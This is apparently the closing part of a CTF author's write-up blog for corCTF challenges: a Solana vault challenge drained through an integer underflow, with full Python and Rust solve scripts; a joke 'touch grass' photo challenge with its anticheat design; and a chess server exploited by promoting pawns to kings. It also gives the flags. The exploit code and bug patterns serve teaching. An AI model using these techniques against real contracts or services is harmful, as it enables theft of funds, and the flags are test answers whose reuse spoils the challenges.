fn withdraw(program: &Pubkey, accounts: &[AccountInfo], lamports: u64) -> ProgramResult { let account_iter = &mut accounts.iter(); let user = next_account_info(account_iter)?; let config = next_account_info(account_iter)?; let vault = next_account_info(account_iter)?; // ensure that the user signed this if !user.is_signer { return Err(ProgramError::MissingRequiredSignature); } // positive amount if lamports <= 0 { return Err(ProgramError::InvalidArgument); } // require that the config is correct if config.owner != program { return Err(ProgramError::InvalidAccountData); } let config_data = &mut Config::deserialize(&mut &(*config.data).borrow_mut()[..])?; if config_data.discriminator != Types::Config { return Err(ProgramError::InvalidAccountData); } // check that the config has enough balance if config_data.total_balance < lamports { return Err(ProgramError::InsufficientFunds); } // ... }

Since we just created a new contract, our total_balance is 0. We need to find a bug that lets us increment total_balance to a really high number so we can drain the vault. If we look in the only place total_balance is changed, vote(), we see this code:

fn vote( program: &Pubkey, accounts: &[AccountInfo], proposal_id: u8, lamports: u64, ) -> ProgramResult { // ... // update the config total balance config_data.total_balance = config_data.total_balance.checked_add(lamports).unwrap() - 100; // keep some for rent config_data .serialize(&mut &mut (*config.data).borrow_mut()[..]) .unwrap(); }

Our config's total_balance is incremented by the lamports we put in the vote, but 100 is subtracted for rent. Notice how we use checked_add correctly to add to total_balance, but then we just subtract 100!

Rust in release mode does not protect against integer underflows/overflows, which means that if we vote with less than 100 lamports, the u64 will underflow below 0, becoming a really high amount.

From there, we can withdraw with our underflowed config, and the original vault (when we run initialize() we also make another vault, but we don't want to use this one because it has no lamports).

I also left another bug in on accident where withdraw() doesn't decrement total_balance. You could use this to repeatedly vote() to increment total_balance and withdraw() to get your money back, incrementing total_balance on your config until you could withdraw enough to win that way. Oops.

Here's my solve scripts:

import os os.system('cargo build-bpf') from pwn import args, remote from solders.pubkey import Pubkey from solders.keypair import Keypair import solders import base58 import binascii import struct host = args.HOST or 'be.ax' port = args.PORT or 30555 program_keypair = Keypair() r = remote(host, port) solve = open('target/deploy/solve.so', 'rb').read() print(r.recvuntil(b'program pubkey: ').decode()) r.sendline(str(program_keypair.pubkey()).encode()) print(r.recvuntil(b'program len: ').decode()) r.sendline(str(len(solve)).encode()) r.send(solve) # get public keys print(r.recvuntil(b'program: ').decode()) program = Pubkey(base58.b58decode(r.recvline().strip())) print(r.recvuntil(b'user: ').decode()) user = Pubkey(base58.b58decode(r.recvline().strip())) print(f"program: {program}") print(f"user: {user}") config, config_bump = None, None # Pubkey.find_program_address([b'CONFIG'], program) vault, vault_bump = None, None # Pubkey.find_program_address([b'VAULT'], program) for i in range(255): try: config, config_bump = Pubkey.create_program_address([b'CONFIG', bytes([i])], program), i break except: continue for i in range(255): try: vault, vault_bump = Pubkey.create_program_address([b'VAULT', bytes([i])], program), i break except: continue print(f"{config_bump=} {vault_bump=}") real_vault, _ = Pubkey.find_program_address([b'VAULT'], program) p4_addr, _ = Pubkey.find_program_address([b'PROPOSAL', b'\x04'], program) print(r.recvuntil(b'num accounts: ').decode()) r.sendline(b'7') r.sendline(b'zzzz ' + str(program).encode()) r.sendline(b'ws ' + str(user).encode()) r.sendline(b'w ' + str(config).encode()) r.sendline(b'w ' + str(vault).encode()) r.sendline(b'w ' + str(real_vault).encode()) r.sendline(b'w ' + str(p4_addr).encode()) r.sendline(b'zzzz ' + str(solders.system_program.ID).encode()) print(r.recvuntil(b'ix len: ').decode()) r.sendline(b'2') r.sendline(bytes([config_bump, vault_bump])) r.interactive()
use borsh::BorshSerialize; use solana_program::{ account_info::{ next_account_info, AccountInfo, }, entrypoint::ProgramResult, instruction::{ AccountMeta, Instruction, }, program::invoke, pubkey::Pubkey, system_program, }; #[derive(borsh::BorshSerialize)] pub enum TribunalInstruction { Initialize { config_bump: u8, vault_bump: u8 }, Propose { proposal_id: u8, proposal_bump: u8 }, Vote { proposal_id: u8, amount: u64 }, Withdraw { amount: u64 }, } pub fn process_instruction(_program: &Pubkey, accounts: &[AccountInfo], data: &[u8]) -> ProgramResult { let account_iter = &mut accounts.iter(); let tribunal = next_account_info(account_iter)?; let user = next_account_info(account_iter)?; let config = next_account_info(account_iter)?; let vault = next_account_info(account_iter)?; let real_vault = next_account_info(account_iter)?; let p4_addr = next_account_info(account_iter)?; let config_bump = data[0]; let vault_bump = data[1]; // use non-canonical config and vault bumps to initialize a config invoke( &Instruction { program_id: *tribunal.key, accounts: vec![ AccountMeta::new(*user.key, true), AccountMeta::new(*config.key, false), AccountMeta::new(*vault.key, false), AccountMeta::new_readonly(system_program::id(), false), ], data: TribunalInstruction::Initialize { config_bump, vault_bump, }.try_to_vec().unwrap(), }, &[user.clone(), config.clone(), vault.clone()] )?; // vote for a proposal with <100 lamports to overflow total balance invoke( &Instruction { program_id: *tribunal.key, accounts: vec![ AccountMeta::new(*user.key, true), AccountMeta::new(*config.key, false), AccountMeta::new(*vault.key, false), AccountMeta::new(*p4_addr.key, false), AccountMeta::new_readonly(system_program::id(), false), ], data: TribunalInstruction::Vote { proposal_id: 4, amount: 1 }.try_to_vec().unwrap(), }, &[user.clone(), config.clone(), vault.clone(), p4_addr.clone()] )?; // now, withdraw with that config invoke( &Instruction { program_id: *tribunal.key, accounts: vec![ AccountMeta::new(*user.key, true), AccountMeta::new(*config.key, false), AccountMeta::new(*real_vault.key, false), AccountMeta::new_readonly(system_program::id(), false), ], data: TribunalInstruction::Withdraw { amount: 98_000_000_000, }.try_to_vec().unwrap(), }, &[user.clone(), config.clone(), real_vault.clone()] )?; Ok(()) }

corctf{its_y0ur_time_to_f4ce_the_CoR_tribunal}

10 solves was more than I was expecting for this challenge, since IMO last year's Solana challenge was easier and got less solves. It seems like more talented teams registered this year, which is nice!

touch-grass

To solve the challenge, go outside and touch grass.

corctf{i_hope_you_d1dnt_have_a_gr4ss_allergy}

I guess I can also explain how the challenge worked behind-the-scenes, since no source was provided.

This challenge was implemented with a NodeJS + Express app (my bread and butter), that made some calls to GCP's Cloud Vision API to do some checks. There were a multitude of anticheat checks (that probably sniped a lot of innocent grass touchers) that were designed to prevent cheating and actually force you to go outside.

Here's a list of everything that happens in the back-end when you upload an image:

  1. Recaptcha is validated (this helps to reduce GCP costs)
  2. The server attempts to read EXIF data, image raw data, and metadata to check for ["imagedescription", "copyright", "paint"] and GIMP. If any are found, this anticheat is triggered.
  3. Cloud Vision's Web Detection is used to reverse image search for your image. If enough online samples are found, the reverse image search anticheat is triggered.
  4. Cloud Vision's Label Detection is then used to detect grass and your hand, stopping if either isn't found.
  5. Cloud Vision's Text Detection is then used to OCR your image to find the code (you are allowed at most one error in the code, and the OCR results are returned to the user).
  6. The final anticheat then runs - if the code is found, it checks the center of each digit and records the color. If there are too many duplicate colors (e.g. you wrote this in some photo editing software with a single brush color), this anticheat is triggered.

Of course, lots of people probably got past all the anticheats. But I also think a lot of people were forced to touch grass, which means this challenge was a success :)

While I wrote the code for this challenge and did all the testing (I had to go outside so many times 😭), special thanks to 0x5a for giving the idea for the challenge and FizzBuzz101 for writing all the anticheat meme messages that got released in #hall-of-shame.

This was definitely a joke challenge but I'm glad that people seemed to like it. You can check out the code on our GitHub when it gets released.

msfrogofwar2

Another year, another chess challenge. This was the fourth chess challenge I helped write or contributed to, and all three corCTFs so far have had one.

The premise is simple, beat the chess AI for a flag. However, the chess AI is Stockfish, the most powerful chess engine out there. While you might be able to run Stockfish to a higher depth locally to outplay the server, you have to do it in 20 moves.

No matter how good you play, there's a 0% chance that you can beat Stockfish in 20 moves. So, there must be some way to exploit the server to beat it, and that was the core of the challenge. I hope you understand how to play chess since I'm not going to be explaining the rules in this writeup.

Most of the provided source is the implementation for a chess move generator. Yes, I wrote my own move generator for this challenge. Yes, it was a real pain in the ass.

Basically, all of the rules of chess are implemented in the provided code, so obviously there was some bug there that you can abuse to beat Stockfish. However, if you stare hard at all the logic for the move generation (I commented almost every line, so hopefully it isn't too bad), you might realize that there are only minor issues.

To convince yourself of this, you can perft my setup - this means counting all the strictly legal moves up to a certain depth, and then comparing it to published known values. When I did this myself on my own engine I found no discrepancies but apparently there were some minor issues, but not anything broken enough to win.

Well, if there's no abusable bug in the move generation, there must be a bug somewhere else in the code. The other part of the is the wrapper code, connecting the game's state and the player input to the chess engine.

The main bug you needed to find was here, in move parsing:

def from_uci(game, uci): move = Move(Position.from_uci(uci[0:2]), Position.from_uci(uci[2:4])) piece = game.board.at(move.start) # if pawn promotion on last rank, set promotion flag if Piece.kind(piece) == Piece.PAWN \ and len(uci) == 5: target_kind = Piece.kind(CHAR_TO_PIECE[uci[4]]) move.promotion = move.end.rank == {Piece.WHITE: 7, Piece.BLACK: 0}[game.turn] and target_kind # ...

When parsing a move in UCI notation (like "e2e4"), if the piece is a pawn and the length is five, it tries to parse it as a promotion. In UCI notation, promotions look like "e7e8q", as in, pawn on square e7 moves to e8 and promotes to a queen. It gets the "kind" of the piece (queen in the above example). Then, it sets move.promotion to move.end.rank == {Piece.WHITE: 7, Piece.BLACK: 0}[game.turn] and target_kind.

Essentially, if the pawn is moving to the final rank, it sets move.promotion to target_kind. If the pawn isn't moving to the final rank, move.promotion is False. That seems fine. But actually, there's a terrible issue here: null pieces in my library are denoted as None, not False.

class Piece: NONE = None KING = 0 PAWN = 1 KNIGHT = 2 BISHOP = 3 ROOK = 4 QUEEN = 5 KIND_MASK = 7 WHITE = 8 BLACK = 16 COLOR_MASK = 24 # ...

Since we set move.promotion to False, it gets used here:

def play_move(self, move, turn): piece = self.at(move.start) start_index = move.start.to_index() end_index = move.end.to_index() self.squares[end_index] = piece self.squares[start_index] = Piece.NONE if move.castle != None: # play rook move stored in castle field self.play_move(move.castle, turn) if move.en_passant != None: # capture pawn stored in en_passant field self.squares[move.en_passant.to_index()] = Piece.NONE if move.promotion != Piece.NONE: # change piece to be the one stored in the promotion field self.squares[end_index] = move.promotion | turn

Essentially, if we do an invalid promotion, we promote to False, or as an number, 0, or as a piece, a king. So we can promote a pawn at any time to a king. How is that useful? Well, let's look at this helper function:

def king_in_danger(game, danger_squares): # loop through board to look for king for index, piece in enumerate(game.board.squares): if piece == Piece.KING | game.turn: king_pos = Position.from_index(index) if king_pos not in danger_squares: return False # else, king is in danger return True

This looks fine at first glance, but actually it makes the hidden assumption that there is only one king. If there are multiple kings, if any are not in danger, the function will always return false!

And this function is used to determine if you're going into checkmate, or where the king can move. So, if you promote multiple pawns to kings, you can basically clean up the entire board and not worry about losing.

Okay, so when sending a UCI string with an invalid promotion, the move will have a pawn promote to king. But how does this move get validated? When you play a move, it checks that the move is legal, which this certainly is not:

def play_move(self, move): if self.game.turn != chesslib.Piece.WHITE: return if self.game.turns >= TURN_LIMIT: return move = movegen.Move.from_uci(self.game, move) legal_moves = self.game.get_moves() if move not in legal_moves: return # ...

Well, let's check how moves are compared:

class Move: # ... def __eq__(a, b): return a and b and a.start == b.start and a.end == b.end

Ah, so when moves are compared, only their positions are checked! That means that when the line move not in legal_moves is ran, if our illegal pawn promotion is move, as long as a legal move exists with the same start and end position, our server will think the move is legal!

The bug is very sneaky. To use this bug, start a new game and then in the JavaScript console you can send the command:

socket.emit("move", "e2e4k")

This moves the pawn on E2 to E4, promoting it to a king. With this bug, it's possible to beat Stockfish in less than 20 moves.

corctf{If you know the enemy and know yourself, you need not fear the croaks of a hundred frogs - Sun Tzu}

This challenge was inspired by this CVE, which I thought was funny. Special thanks to Quintec on the team for helping me test the challenge!


Thanks for reading! I hope you enjoyed the CTF!

Anyway, those are all the writeups for my challenges. Writing challenges is always a lot of fun, and I hope to see you again next year for corCTF 2023!

Feel free to DM me on Discord @ strellic if you have any questions.

Also, follow me on Twitter.

Also, if you're going to DEF CON Finals this year in-person and meet up, send me a DM!

Also, check out SekaiCTF 2023! I'm writing some more web challenges for that CTF so I hope to see you there!

Thanks for reading!